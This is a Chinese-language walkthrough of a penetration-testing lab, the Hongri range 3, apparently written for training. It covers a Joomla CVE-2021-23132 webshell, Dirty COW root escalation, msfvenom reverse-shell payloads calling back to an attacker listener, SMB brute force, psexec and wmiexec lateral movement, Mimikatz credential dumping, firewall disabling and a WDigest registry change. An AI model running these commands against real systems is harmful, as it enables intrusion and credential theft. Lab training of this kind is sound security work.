内网渗透实战教学：红日靶场三渗透测试全流程

一、环境准备与网络拓扑

1. 网络配置

• 外网段：192.168.57.0/24 (NAT模式)
• 内网段：192.168.93.0/24 (仅主机模式)
• VMnet配置：必须为内网段配置VMnet3，否则路由设置会出问题

2. 靶机组成

• 外网机器：Ubuntu (192.168.57.145)
• 内网机器：
  • 域控：WIN-8GA56TNV3MV (192.168.93.10)
  • WIN2008服务器 (192.168.93.20)
  • WIN7主机 (192.168.93.30)

二、外网渗透阶段

1. 信息收集

1. 端口扫描：

   nmap -sS 192.168.57.145
   

   发现开放端口：80(HTTP)、3306(MySQL)等

2. Web应用识别：

   • 使用Joomscan识别CMS版本：

     joomscan -u http://192.168.57.145
     

   • 确认Joomla版本：3.9.12

3. 目录扫描：

   • 使用dirmap发现敏感文件：
     • /1.php - 包含配置信息
     • /configuration.php~ - 包含数据库凭据

2. 数据库利用

1. 连接MySQL：

   • 使用Navicat或命令行连接：

     mysql -h 192.168.57.145 -u [username] -p[password]
     

2. 提取管理员凭据：

   • 查询joomla数据库中的am2zu_users表
   • 获取超级用户哈希：$2y$10$OLQJ/GnhLJR/AqLsSk1hFOyqL8TxGG2r9R3QeRCibGCQGj6ZyJvCe
   • 使用密码123456成功登录后台

3. 漏洞利用(CVE-2021-23132)

1. 漏洞复现步骤：

   • 进入Media → Options
   • 修改文件路径实现目录遍历
   • 在/templates/beez3/error.php写入一句话木马

2. Webshell连接：

   • 使用蚁剑连接：

     http://192.168.57.145/templates/beez3/error.php
     

4. 绕过disable_functions

• 使用蚁剑插件绕过限制
• 选择适当的绕过模式并执行

5. 内网发现

• 执行ifconfig发现新网段：192.168.93.120/24
• 确认存在反向代理架构

6. SSH横向移动

1. 凭据发现：

   • 在/tmp/mysql/test.txt找到SSH凭据

2. SSH登录：

   ssh [username]@192.168.57.145
   

7. 权限提升(脏牛漏洞)

1. 漏洞利用：

   gcc -pthread dirty.c -o dirty -lcrypt
   ./dirty
   

2. 结果：
   • 创建新用户firefart，密码123456
   • 获得root权限

8. 上线MSF

1. 生成payload：

   msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.57.128 LPORT=5555 -f elf -o shell.elf
   

2. 监听设置：

   use exploit/multi/handler
   set payload linux/x64/meterpreter/reverse_tcp
   set LHOST 192.168.57.128
   set LPORT 5555
   run
   

三、内网渗透阶段

1. 路由与代理配置

1. 添加路由：

   route add 192.168.93.0 255.255.255.0 [session_id]
   

2. 设置SOCKS代理：

   use auxiliary/server/socks_proxy
   set version 4a
   set srvport 8989
   run
   

2. 内网信息收集

1. 主机发现：

   • 使用MSF的arp_scanner模块扫描192.168.93.0/24网段

2. 端口扫描：

   use auxiliary/scanner/portscan/tcp
   set RHOSTS 192.168.93.10 192.168.93.20 192.168.93.30
   set PORTS 1-10000
   run
   

3. 横向移动(SMB爆破)

1. 爆破WIN2008：

   use auxiliary/scanner/smb/smb_login
   set RHOSTS 192.168.93.20
   set SMBUser administrator
   set pass_file /root/dict/pass.txt
   run
   

   • 获取密码：123qwe!ASD

2. psexec横向：

   use exploit/windows/smb/psexec
   set payload windows/x64/meterpreter/bind_tcp
   set SMBUser administrator
   set SMBPass 123qwe!ASD
   set RHOSTS 192.168.93.20
   run
   

4. 域渗透

1. 信息收集：

   • 确认域名为：test.org
   • 域控IP：192.168.93.10

2. 凭据提取：

   load kiwi
   kiwi_cmd privilege::debug
   kiwi_cmd sekurlsa::logonPasswords
   

   • 获取域管密码：zxcASDqw123!!

3. 域控横向：

   • 方法一：WMIexec

     proxychains4 python3 wmiexec.py -debug 'administrator:zxcASDqw123!!@192.168.93.10'
     

   • 方法二：关闭防火墙后psexec

     netsh advfirewall set allprofiles state off
     

四、关键技术与工具总结

1. 核心技术

• Joomla漏洞利用(CVE-2021-23132)
• Linux提权(脏牛漏洞)
• SMB协议利用(psexec/wmiexec)
• 域环境渗透技巧

2. 主要工具

• 信息收集：nmap、Joomscan、dirmap
• Webshell管理：蚁剑
• 漏洞利用：MSF、自定义exploit
• 横向移动：psexec、wmiexec.py
• 凭据提取：Mimikatz(kiwi)

3. 渗透流程总结

1. 外网Web应用渗透
2. 获取初始立足点
3. 内网探测与横向移动
4. 权限提升与持久化
5. 域环境渗透与控制

五、常见问题解决

1. 反弹shell失败：

   • 检查网络架构，确认是否存在反向代理
   • 尝试bind shell替代reverse shell

2. Mimikatz抓不到密码：

   • 尝试修改注册表后重新登录

   reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f
   

   • 重启或等待用户重新登录

3. psexec横向失败：

   • 检查目标防火墙状态
   • 尝试替代方法如wmiexec或smbexec

4. 代理设置问题：

   • 确保/etc/proxychains4.conf配置正确
   • 测试代理通道是否畅通